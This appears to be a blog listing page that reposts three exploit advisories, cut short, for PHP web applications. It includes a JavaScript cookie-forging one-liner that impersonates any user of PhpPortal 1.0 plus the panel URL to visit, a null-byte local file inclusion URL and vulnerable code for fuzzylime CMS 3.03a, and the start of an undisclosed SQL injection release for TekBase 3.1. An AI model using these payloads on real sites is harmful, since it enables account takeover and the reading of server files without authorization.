phportal 1.0 Insecure Cookie Handling Vulnerability

Posted by admin Published in Software

########################################################
PhpPortal v1 Insecure Cookie Handling Vulnerability
########################################################

Author : KnocKout
Special Thankz : CW All users
Script : http://phportal.mertindualari.com

########################################################

Exploit;

javascript:document.cookie=”kulladi=[Username];path=/”;
Enter..

Go To; http://target.com/uye_paneli.php?islem=bilgilerim

########################################################

Captured from milw0rm.com

1 comment

Jun

fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC

Posted by admin Published in Software

+————————————————————————+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+———–+————————————————————+
| by staker |
+———–+———————+
| mail: staker[at]hotmail[dot]it |
| url: http://cms.fuzzylime.co.uk |
+———————————+

[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion mq=off)
—————————————————————–
1. <?
2. @extract($HTTP_GET_VARS); <——– {1}
3. @extract($_GET); [...]

no comment

Jun

TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities

Posted by admin Published in Hacking

############################
# Author: n3wb0ss
# Date: 15/06/09
# Contact: n3wboss@Safe-mail.net
############################
# Software: TekBase All-in-One 3.1
# Vendor: tekbase.de
# Example: http://demo.tekbase.de/
# Vendor contacted: No
# Risk: High
############################
# I found this website on a german board, looking for another script.
# Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter…
# It’s vuln I found a lot more, but I decided to release just two [...]

no comment